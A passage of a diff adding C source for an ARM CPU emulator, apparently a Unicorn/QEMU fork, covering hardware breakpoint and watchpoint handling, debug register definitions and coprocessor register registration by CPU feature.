arm_env_get_cpu(env); + int i = ri->crm; + + /* Bits [63:49] are hardwired to the value of bit [48]; that is, the + * register reads and behaves as if values written are sign extended. + * Bits [1:0] are RES0. + */ + value = sextract64(value, 0, 49) & ~3ULL; + + raw_write(env, ri, value); + hw_watchpoint_update(cpu, i); +} + +static void dbgwcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int i = ri->crm; + + raw_write(env, ri, value); + hw_watchpoint_update(cpu, i); +} + +void hw_breakpoint_update(ARMCPU *cpu, int n) +{ + CPUARMState *env = &cpu->env; + uint64_t bvr = env->cp15.dbgbvr[n]; + uint64_t bcr = env->cp15.dbgbcr[n]; + vaddr addr; + int bt; + int flags = BP_CPU; + + if (env->cpu_breakpoint[n]) { + cpu_breakpoint_remove_by_ref(CPU(cpu), env->cpu_breakpoint[n]); + env->cpu_breakpoint[n] = NULL; + } + + if (!extract64(bcr, 0, 1)) { + /* E bit clear : watchpoint disabled */ + return; + } + + bt = extract64(bcr, 20, 4); + + switch (bt) { + case 4: /* unlinked address mismatch (reserved if AArch64) */ + case 5: /* linked address mismatch (reserved if AArch64) */ + qemu_log_mask(LOG_UNIMP, + "arm: address mismatch breakpoint types not implemented"); + return; + case 0: /* unlinked address match */ + case 1: /* linked address match */ + { + /* Bits [63:49] are hardwired to the value of bit [48]; that is, + * we behave as if the register was sign extended. Bits [1:0] are + * RES0. The BAS field is used to allow setting breakpoints on 16 + * bit wide instructions; it is CONSTRAINED UNPREDICTABLE whether + * a bp will fire if the addresses covered by the bp and the addresses + * covered by the insn overlap but the insn doesn't start at the + * start of the bp address range. We choose to require the insn and + * the bp to have the same address. The constraints on writing to + * BAS enforced in dbgbcr_write mean we have only four cases: + * 0b0000 => no breakpoint + * 0b0011 => breakpoint on addr + * 0b1100 => breakpoint on addr + 2 + * 0b1111 => breakpoint on addr + * See also figure D2-3 in the v8 ARM ARM (DDI0487A.c). + */ + int bas = extract64(bcr, 5, 4); + addr = sextract64(bvr, 0, 49) & ~3ULL; + if (bas == 0) { + return; + } + if (bas == 0xc) { + addr += 2; + } + break; + } + case 2: /* unlinked context ID match */ + case 8: /* unlinked VMID match (reserved if no EL2) */ + case 10: /* unlinked context ID and VMID match (reserved if no EL2) */ + qemu_log_mask(LOG_UNIMP, + "arm: unlinked context breakpoint types not implemented"); + return; + case 9: /* linked VMID match (reserved if no EL2) */ + case 11: /* linked context ID and VMID match (reserved if no EL2) */ + case 3: /* linked context ID match */ + default: + /* We must generate no events for Linked context matches (unless + * they are linked to by some other bp/wp, which is handled in + * updates for the linking bp/wp). We choose to also generate no events + * for reserved values. + */ + return; + } + + cpu_breakpoint_insert(CPU(cpu), addr, flags, &env->cpu_breakpoint[n]); +} + +void hw_breakpoint_update_all(ARMCPU *cpu) +{ + int i; + CPUARMState *env = &cpu->env; + + /* Completely clear out existing QEMU breakpoints and our array, to + * avoid possible stale entries following migration load. + */ + cpu_breakpoint_remove_all(CPU(cpu), BP_CPU); + memset(env->cpu_breakpoint, 0, sizeof(env->cpu_breakpoint)); + + for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_breakpoint); i++) { + hw_breakpoint_update(cpu, i); + } +} + +static void dbgbvr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int i = ri->crm; + + raw_write(env, ri, value); + hw_breakpoint_update(cpu, i); +} + +static void dbgbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int i = ri->crm; + + /* BAS[3] is a read-only copy of BAS[2], and BAS[1] a read-only + * copy of BAS[0]. + */ + value = deposit64(value, 6, 1, extract64(value, 5, 1)); + value = deposit64(value, 8, 1, extract64(value, 7, 1)); + + raw_write(env, ri, value); + hw_breakpoint_update(cpu, i); +} + +static void define_debug_regs(ARMCPU *cpu) +{ + /* Define v7 and v8 architectural debug registers. + * These are just dummy implementations for now. + */ + int i; + int wrps, brps, ctx_cmps; + ARMCPRegInfo dbgdidr = { + "DBGDIDR", 14,0,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, cpu->dbgdidr, + }; + + /* Note that all these register fields hold "number of Xs minus 1". */ + brps = extract32(cpu->dbgdidr, 24, 4); + wrps = extract32(cpu->dbgdidr, 28, 4); + ctx_cmps = extract32(cpu->dbgdidr, 20, 4); + + assert(ctx_cmps <= brps); + + /* The DBGDIDR and ID_AA64DFR0_EL1 define various properties + * of the debug registers such as number of breakpoints; + * check that if they both exist then they agree. + */ + if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { + assert(extract32(cpu->id_aa64dfr0, 12, 4) == brps); + assert(extract32(cpu->id_aa64dfr0, 20, 4) == wrps); + assert(extract32(cpu->id_aa64dfr0, 28, 4) == ctx_cmps); + } + + define_one_arm_cp_reg(cpu, &dbgdidr); + define_arm_cp_regs(cpu, debug_cp_reginfo); + + if (arm_feature(&cpu->env, ARM_FEATURE_LPAE)) { + define_arm_cp_regs(cpu, debug_lpae_cp_reginfo); + } + + for (i = 0; i < brps + 1; i++) { + ARMCPRegInfo dbgregs[] = { + { "DBGBVR", 14,0,i, 2,0,4,ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgbvr[i]), + NULL, NULL,dbgbvr_write, NULL,raw_write + }, + { "DBGBCR", 14,0,i, 2,0,5, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgbcr[i]), + NULL, NULL,dbgbcr_write, NULL,raw_write + }, + REGINFO_SENTINEL + }; + define_arm_cp_regs(cpu, dbgregs); + } + + for (i = 0; i < wrps + 1; i++) { + ARMCPRegInfo dbgregs[] = { + { "DBGWVR", 14,0,i, 2,0,6, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgwvr[i]), + NULL, NULL,dbgwvr_write, NULL,raw_write + }, + { "DBGWCR", 14,0,i, 2,0,7, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgwcr[i]), + NULL, NULL,dbgwcr_write, NULL,raw_write + }, + REGINFO_SENTINEL + }; + define_arm_cp_regs(cpu, dbgregs); + } +} + +void register_cp_regs_for_features(ARMCPU *cpu) +{ + /* Register all the coprocessor registers based on feature bits */ + CPUARMState *env = &cpu->env; + if (arm_feature(env, ARM_FEATURE_M)) { + /* M profile has no coprocessor registers */ + return; + } + + define_arm_cp_regs(cpu, cp_reginfo); + if (!arm_feature(env, ARM_FEATURE_V8)) { + /* Must go early as it is full of wildcards that may be + * overridden by later definitions. + */ + define_arm_cp_regs(cpu, not_v8_cp_reginfo); + } + + if (arm_feature(env, ARM_FEATURE_V6)) { + /* The ID registers all have impdef reset values */ + ARMCPRegInfo v6_idregs[] = { + { "ID_PFR0", 0,0,1, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_pfr0 }, + { "ID_PFR1", 0,0,1, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_pfr1 }, + { "ID_DFR0", 0,0,1, 3,0,2, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_dfr0 }, + { "ID_AFR0", 0,0,1, 3,0,3, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_afr0 }, + { "ID_MMFR0", 0,0,1, 3,0,4, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr0 }, + { "ID_MMFR1", 0,0,1, 3,0,5, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr1 }, + { "ID_MMFR2", 0,0,1, 3,0,6, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr2 }, + { "ID_MMFR3", 0,0,1, 3,0,7, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr3 }, + { "ID_ISAR0", 0,0,2, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar0 }, + { "ID_ISAR1", 0,0,2, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar1 }, + { "ID_ISAR2", 0,0,2, 3,0,2, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar2 }, + { "ID_ISAR3", 0,0,2, 3,0,3, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar3 }, + { "ID_ISAR4", 0,0,2, 3,0,4, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar4 }, + { "ID_ISAR5", 0,0,2, 3,0,5, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar5 }, + /* 6..7 are as yet unallocated and must RAZ */ + { "ID_ISAR6", 15,0,2, 0,0,6, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "ID_ISAR7", 15,0,2, 0,0,7, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + REGINFO_SENTINEL + }; + define_arm_cp_regs(cpu, v6_idregs); + define_arm_cp_regs(cpu, v6_cp_reginfo); + } else { + define_arm_cp_regs(cpu, not_v6_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V6K)) { + define_arm_cp_regs(cpu, v6k_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V7MP)) { + define_arm_cp_regs(cpu, v7mp_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V7)) { + ARMCPRegInfo clidr = { + "CLIDR", 0,0,0, 3,1,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->clidr + }; + /* v7 performance monitor control register: same implementor + * field as main ID register, and we implement only the cycle + * count register. + */ +#ifndef CONFIG_USER_ONLY + ARMCPRegInfo pmcr = { + "PMCR", 15,9,12, 0,0,0, 0, + ARM_CP_IO | ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c9_pmcr), + pmreg_access, NULL,pmcr_write, NULL,raw_write, + }; + ARMCPRegInfo pmcr64 = { + "PMCR_EL0", 0,9,12, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_IO, PL0_RW, NULL, cpu->midr & 0xff000000, offsetof(CPUARMState, cp15.c9_pmcr), + pmreg_access, NULL,pmcr_write, NULL,raw_write, + }; + define_one_arm_cp_reg(cpu, &pmcr); + define_one_arm_cp_reg(cpu, &pmcr64); +#endif + define_one_arm_cp_reg(cpu, &clidr); + define_arm_cp_regs(cpu, v7_cp_reginfo); + define_debug_regs(cpu); + } else { + define_arm_cp_regs(cpu, not_v7_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V8)) { + /* AArch64 ID registers, which all have impdef reset values */ + ARMCPRegInfo v8_idregs[] = { + { "ID_AA64PFR0_EL1", 0,0,4, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64pfr0 }, + { "ID_AA64PFR1_EL1", 0,0,4, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64pfr1}, + { "ID_AA64DFR0_EL1", 0,0,5, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, + /* We mask out the PMUVer field, because we don't currently + * implement the PMU. Not advertising it prevents the guest + * from trying to use it and getting UNDEFs on registers we + * don't implement. + */ + cpu->id_aa64dfr0 & ~0xf00 }, + { "ID_AA64DFR1_EL1", 0,0,5, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64dfr1 }, + { "ID_AA64AFR0_EL1", 0,0,5, 3,0,4, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64afr0 }, + { "ID_AA64AFR1_EL1", 0,0,5, 3,0,5, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64afr1 }, + { "ID_AA64ISAR0_EL1", 0,0,6, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64isar0 }, + { "ID_AA64ISAR1_EL1", 0,0,6, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64isar1 }, + { "ID_AA64MMFR0_EL1", 0,0,7, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64mmfr0 }, + { "ID_AA64MMFR1_EL1", 0,0,7, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64mmfr1 }, + { "MVFR0_EL1", 0,0,3, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->mvfr0 }, + { "MVFR1_EL1", 0,0,3, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->mvfr1 }, + { "MVFR2_EL1", 0,0,3, 3,0,2, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->mvfr2 }, + REGINFO_SENTINEL + }; + ARMCPRegInfo rvbar = { + "RVBAR_EL1", 0,12,0, 3,0,2, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->rvbar + }; + define_one_arm_cp_reg(cpu, &rvbar); + define_arm_cp_regs(cpu, v8_idregs); + define_arm_cp_regs(cpu, v8_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_EL2)) { + define_arm_cp_regs(cpu, v8_el2_cp_reginfo); + } else { + /* If EL2 is missing but higher ELs are enabled, we need to + * register the no_el2 reginfos. + */ + if (arm_feature(env, ARM_FEATURE_EL3)) { + define_arm_cp_regs(cpu, v8_el3_no_el2_cp_reginfo); + } + } + if (arm_feature(env, ARM_FEATURE_EL3)) { + define_arm_cp_regs(cpu, v8_el3_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_MPU)) { + /* These are the MPU registers prior to PMSAv6. Any new + * PMSA core later than the ARM946 will require that we + * implement the PMSAv6 or PMSAv7 registers, which are + * completely different. + */ + assert(!arm_feature(env, ARM_FEATURE_V6)); + define_arm_cp_regs(cpu, pmsav5_cp_reginfo); + } else { + define_arm_cp_regs(cpu, vmsa_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_THUMB2EE)) { + define_arm_cp_regs(cpu, t2ee_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_GENERIC_TIMER)) { + define_arm_cp_regs(cpu, generic_timer_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_VAPA)) { + define_arm_cp_regs(cpu, vapa_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_CACHE_TEST_CLEAN)) { + define_arm_cp_regs(cpu, cache_test_clean_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_CACHE_DIRTY_REG)) { + define_arm_cp_regs(cpu, cache_dirty_status_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_CACHE_BLOCK_OPS)) { + define_arm_cp_regs(cpu, cache_block_ops_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_OMAPCP)) { + define_arm_cp_regs(cpu, omap_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_STRONGARM)) { + define_arm_cp_regs(cpu, strongarm_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_XSCALE)) { + define_arm_cp_regs(cpu, xscale_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_DUMMY_C15_REGS)) { + define_arm_cp_regs(cpu, dummy_c15_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_LPAE)) { + define_arm_cp_regs(cpu, lpae_cp_reginfo); + } + /* Slightly awkwardly, the OMAP and StrongARM cores need all of + * cp15 crn=0 to be writes-ignored, whereas for other cores they should + * be read-only (ie write causes UNDEF exception). + */ + { + ARMCPRegInfo id_pre_v8_midr_cp_reginfo[] = { + /* Pre-v8 MIDR space. + * Note that the MIDR isn't a simple constant register because + * of the TI925 behaviour where writes to another register can + * cause the MIDR value to change. + * + * Unimplemented registers in the c15 0 0 0 space default to + * MIDR. Define MIDR first as this entire space, then CTR, TCMTR + * and friends override accordingly. + */ + { "MIDR", 15,0,0, 0,0,CP_ANY, 0, + ARM_CP_OVERRIDE, PL1_R, NULL, cpu->midr, offsetof(CPUARMState, cp15.c0_cpuid), + NULL, NULL,arm_cp_write_ignore, NULL,raw_write, }, + /* crn = 0 op1 = 0 crm = 3..7 : currently unassigned; we RAZ. */ + { "DUMMY", + 15,0,3, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,4, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,5, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,6, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,7, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + REGINFO_SENTINEL + }; + ARMCPRegInfo id_v8_midr_cp_reginfo[] = { + /* v8 MIDR -- the wildcard isn't necessary, and nor is the + * variable-MIDR TI925 behaviour. Instead we have a single + * (strictly speaking IMPDEF) alias of the MIDR, REVIDR. + */ + { "MIDR_EL1", 0,0,0, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->midr }, + { "REVIDR_EL1", 0,0,0, 3,0,6, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->midr }, + REGINFO_SENTINEL + }; + ARMCPRegInfo id_cp_reginfo[] = { + /* These are common to v8 and pre-v8 */ + { "CTR", 15,0,0, 0,0,1, 0, + ARM_CP_CONST, PL1_R, NULL, cpu->ctr }, + { "CTR_EL0", 0,0,0, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL0_R, NULL, cpu->ctr, 0, + ctr_el0_access, }, + /* TCMTR and TLBTR exist in v8 but have no 64-bit versions */ + { "TCMTR", 15,0,0, 0,0,2, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "TLBTR", 15,0,0, 0,0,3, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + REGINFO_SENTINEL + }; + ARMCPRegInfo crn0_wi_reginfo = { + "CRN0_WI", 15,0,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_NOP | ARM_CP_OVERRIDE, PL1_W, + }; + if (arm_feature(env, ARM_FEATURE_OMAPCP) || + arm_feature(env, ARM_FEATURE_STRONGARM)) { + ARMCPRegInfo *r; + /* Register the blanket "writes ignored" value first to cover the + * whole space. Then update the specific ID registers to allow write + * access, so that they ignore writes rather than causing them to + * UNDEF. + */ + define_one_arm_cp_reg(cpu, &crn0_wi_reginfo); + for (r = id_pre_v8_midr_cp_reginfo; + r->type != ARM_CP_SENTINEL; r++) { + r->access = PL1_RW; + } + for (r = id_cp_reginfo; r->type != ARM_CP_SENTINEL; r++) { + r->access = PL1_RW; + } + } + if (arm_feature(env, ARM_FEATURE_V8)) { + define_arm_cp_regs(cpu, id_v8_midr_cp_reginfo); + } else { + define_arm_cp_regs(cpu, id_pre_v8_midr_cp_reginfo); + } + define_arm_cp_regs(cpu, id_cp_reginfo); + } + + if (arm_feature(env, ARM_FEATURE_MPIDR)) { + define_arm_cp_regs(cpu, mpidr_cp_reginfo); + } + + if (arm_feature(env, ARM_FEATURE_AUXCR)) { + ARMCPRegInfo auxcr = { + "ACTLR_EL1", 0,1,0, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, cpu->reset_auxcr + }; + define_one_arm_cp_reg(cpu, &auxcr); + } + + if (arm_feature(env, ARM_FEATURE_CBAR)) { + if (arm_feature(env, ARM_FEATURE_AARCH64)) { + /* 32 bit view is [31:18] 0...0 [43:32]. */ + uint32_t cbar32 = (extract64(cpu->reset_cbar, 18, 14) << 18) + | extract64(cpu->reset_cbar, 32, 12); + ARMCPRegInfo cbar_reginfo[] = { + { "CBAR", 15,15,0, 0,4,0, 0, + ARM_CP_CONST, PL1_R, NULL, cpu->reset_cbar }, + { "CBAR_EL1", 0,15,3, 3,1,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cbar32 }, + REGINFO_SENTINEL + }; + /* We don't implement a r/w 64 bit CBAR currently */ + assert(arm_feature(env, ARM_FEATURE_CBAR_RO)); + define_arm_cp_regs(cpu, cbar_reginfo); + } else { + ARMCPRegInfo cbar = { + "CBAR", 15,15,0, 0,4,0, 0, + 0, PL1_R|PL3_W, NULL, cpu->reset_cbar, offsetof(CPUARMState, cp15.c15_config_base_address) + }; + if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { + cbar.access = PL1_R; + cbar.fieldoffset = 0; + cbar.type = ARM_CP_CONST; + } + define_one_arm_cp_reg(cpu, &cbar); + } + } + + /* Generic registers whose values depend on the implementation */ + { + ARMCPRegInfo sctlr = { + "SCTLR", 0,1,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, cpu->reset_sctlr, offsetof(CPUARMState, cp15.c1_sys), + NULL, NULL,sctlr_write, NULL,raw_write, + }; + if (arm_feature(env, ARM_FEATURE_XSCALE)) { + /* Normally we would always end the TB on an SCTLR write, but Linux + * arch/arm/mach-pxa/sleep.S expects two instructions following + * an MMU enable to execute from cache. Imitate this behaviour. + */ + sctlr.type |= ARM_CP_SUPPRESS_TB_END; + } + define_one_arm_cp_reg(cpu, &sctlr); + } +} + +ARMCPU *cpu_arm_init(struct uc_struct *uc, const char *cpu_model) +{ + return ARM_CPU(uc, cpu_generic_init(uc, TYPE_ARM_CPU, cpu_model)); +} + +void arm_cpu_register_gdb_regs_for_features(ARMCPU *cpu) +{ +#if 0 + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + + if (arm_feature(env, ARM_FEATURE_AARCH64)) { + gdb_register_coprocessor(cs, aarch64_fpu_gdb_get_reg, + aarch64_fpu_gdb_set_reg, + 34, "aarch64-fpu.xml", 0); + } else if (arm_feature(env, ARM_FEATURE_NEON)) { + gdb_register_coprocessor(cs, vfp_gdb_get_reg, vfp_gdb_set_reg, + 51, "arm-neon.xml", 0); + } else if (arm_feature(env, ARM_FEATURE_VFP3)) { + gdb_register_coprocessor(cs, vfp_gdb_get_reg, vfp_gdb_set_reg, + 35, "arm-vfp3.xml", 0); + } else if (arm_feature(env, ARM_FEATURE_VFP)) { + gdb_register_coprocessor(cs, vfp_gdb_get_reg, vfp_gdb_set_reg, + 19, "arm-vfp.xml", 0); + } +#endif +} + +/* Sort alphabetically by type name, except for "any". */ +#if 0 +static void arm_cpu_list_entry(gpointer data, gpointer user_data) +{ + ObjectClass *oc = data; + CPUListState *s = user_data; + const char *typename; + char *name; + + typename = object_class_get_name(oc); + name = g_strndup(typename, strlen(typename) - strlen("-" TYPE_ARM_CPU)); + (*s->cpu_fprintf)(s->file, " %s\n", + name); + g_free(name); +} +#endif + +void arm_cpu_list(FILE *f, fprintf_function cpu_fprintf) +{ +#if 0 + CPUListState s = { + .file = f, + .cpu_fprintf = cpu_fprintf, + }; + GSList *list; + + list = object_class_get_list(TYPE_ARM_CPU, false); + list = g_slist_sort(list, arm_cpu_list_compare); + (*cpu_fprintf)(f, "Available CPUs:\n"); + g_slist_foreach(list, arm_cpu_list_entry, &s); + g_slist_free(list); +#ifdef CONFIG_KVM + /* The 'host' CPU type is dynamically registered only if KVM is + * enabled, so we have to special-case it here: + */ + (*cpu_fprintf)(f, " host (only available in KVM mode)\n"); +#endif +#endif +} + +static void add_cpreg_to_hashtable(ARMCPU *cpu, const ARMCPRegInfo *r, + void *opaque, int state, + int crm, int opc1, int opc2) +{ + /* Private utility function for define_one_arm_cp_reg_with_opaque(): + * add a single reginfo struct to the hash table. + */ + uint32_t *key = g_new(uint32_t, 1); + ARMCPRegInfo *r2 = g_memdup(r, sizeof(ARMCPRegInfo)); + int is64 = (r->type & ARM_CP_64BIT) ? 1 : 0; + if (r->state == ARM_CP_STATE_BOTH && state == ARM_CP_STATE_AA32) { + /* The AArch32 view of a shared register sees the lower 32 bits + * of a 64 bit backing field. It is not migratable as the AArch64 + * view handles that. AArch64 also handles reset. + * We assume it is a cp15 register if the .cp field is left unset. + */ + if (r2->cp == 0) { + r2->cp = 15; + } + r2->type |= ARM_CP_NO_MIGRATE; + r2->resetfn = arm_cp_reset_ignore; +#ifdef HOST_WORDS_BIGENDIAN + if (r2->fieldoffset) { + r2->fieldoffset += sizeof(uint32_t); + } +#endif + } + if (state == ARM_CP_STATE_AA64) { + /* To allow abbreviation of ARMCPRegInfo + * definitions, we treat cp == 0 as equivalent to + * the value for "standard guest-visible sysreg". + * STATE_BOTH definitions are also always "standard + * sysreg" in their AArch64 view (the .cp value may + * be non-zero for the benefit of the AArch32 view). + */ + if (r->cp == 0 || r->state == ARM_CP_STATE_BOTH) { + r2->cp = CP_REG_ARM64_SYSREG_CP; + } + *key = ENCODE_AA64_CP_REG(r2->cp, r2->crn, crm, + r2->opc0, opc1, opc2); + } else { + *key = ENCODE_CP_REG(r2->cp, is64, r2->crn, crm, opc1, opc2); + } + if (opaque) { + r2->opaque = opaque; + } + /* reginfo passed to helpers is correct for the actual access, + * and is never ARM_CP_STATE_BOTH: + */ + r2->state = state; + /* Make sure reginfo passed to helpers for wildcarded regs + * has the correct crm/opc1/opc2 for this reg, not CP_ANY: + */ + r2->crm = crm; + r2->opc1 = opc1; + r2->opc2 = opc2; + /* By convention, for wildcarded registers only the first + * entry is used for migration; the others are marked as + * NO_MIGRATE so we don't try to transfer the register + * multiple times. Special registers (ie NOP/WFI) are + * never migratable. + */ + if ((r->type & ARM_CP_SPECIAL) || + ((r->crm == CP_ANY) && crm != 0) || + ((r->opc1 == CP_ANY) && opc1 != 0) || + ((r->opc2 == CP_ANY) && opc2 != 0)) { + r2->type |= ARM_CP_NO_MIGRATE; + } + + /* Overriding of an existing definition must be explicitly + * requested. + */ + if (!(r->type & ARM_CP_OVERRIDE)) { + ARMCPRegInfo *oldreg; + oldreg = g_hash_table_lookup(cpu->cp_regs, key); + if (oldreg && !(oldreg->type & ARM_CP_OVERRIDE)) { + fprintf(stderr, "Register redefined: cp=%d %d bit " + "crn=%d crm=%d opc1=%d opc2=%d, " + "was %s, now %s\n", r2->cp, 32 + 32 * is64, + r2->crn, r2->crm, r2->opc1, r2->opc2, + oldreg->name, r2->name); + g_assert_not_reached(); + } + } + g_hash_table_insert(cpu->cp_regs, key, r2); +} + + +void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *r, void *opaque) +{ + /* Define implementations of coprocessor registers. + * We store these in a hashtable because typically + * there are less than 150 registers in a space which + * is 16*16*16*8*8 = 262144 in size. + * Wildcarding is supported for the crm, opc1 and opc2 fields. + * If a register is defined twice then the second definition is + * used, so this can be used to define some generic registers and + * then override them with implementation specific variations. + * At least one of the original and the second definition should + * include ARM_CP_OVERRIDE in its type bits -- this is just a guard + * against accidental use. + * + * The state field defines whether the register is to be + * visible in the AArch32 or AArch64 execution state. If the + * state is set to ARM_CP_STATE_BOTH then we synthesise a + * reginfo structure for the AArch32 view, which sees the lower + * 32 bits of the 64 bit register. + * + * Only registers visible in AArch64 may set r->opc0; opc0 cannot + * be wildcarded. AArch64 registers are always considered to be 64 + * bits; the ARM_CP_64BIT* flag applies only to the AArch32 view of + * the register, if any. + */ + int crm, opc1, opc2, state; + int crmmin = (r->crm == CP_ANY) ? 0 : r->crm; + int crmmax = (r->crm == CP_ANY) ? 15 : r->crm; + int opc1min = (r->opc1 == CP_ANY) ? 0 : r->opc1; + int opc1max = (r->opc1 == CP_ANY) ? 7 : r->opc1; + int opc2min = (r->opc2 == CP_ANY) ? 0 : r->opc2; + int opc2max = (r->opc2 == CP_ANY) ? 7 : r->opc2; + /* 64 bit registers have only CRm and Opc1 fields */ + assert(!((r->type & ARM_CP_64BIT) && (r->opc2 || r->crn))); + /* op0 only exists in the AArch64 encodings */ + assert((r->state != ARM_CP_STATE_AA32) || (r->opc0 == 0)); + /* AArch64 regs are all 64 bit so ARM_CP_64BIT is meaningless */ + assert((r->state != ARM_CP_STATE_AA64) || !(r->type & ARM_CP_64BIT)); + /* The AArch64 pseudocode CheckSystemAccess() specifies that op1 + * encodes a minimum access level for the register. We roll this + * runtime check into our general permission check code, so check + * here that the reginfo's specified permissions are strict enough + * to encompass the generic architectural permission check. + */ + if (r->state != ARM_CP_STATE_AA32) { + int mask = 0; + switch (r->opc1) { + case 0: case 1: case 2: + /* min_EL EL1 */ + mask = PL1_RW; + break; + case 3: + /* min_EL EL0 */ + mask = PL0_RW; + break; + case 4: + /* min_EL EL2 */ + mask = PL2_RW; + break; + case 5: + /* unallocated encoding, so not possible */ + assert(false); + break; + case 6: + /* min_EL EL3 */ + mask = PL3_RW; + break; + case 7: + /* min_EL EL1, secure mode only (we don't check the latter) */ + mask = PL1_RW; + break; + default: + /* broken reginfo with out-of-range opc1 */ + assert(false); + break; + } + /* assert our permissions are not too lax (stricter is fine) */ + assert((r->access & ~mask) == 0); + } + + /* Check that the register definition has enough info to handle + * reads and writes if they are permitted. + */ + if (!(r->type & 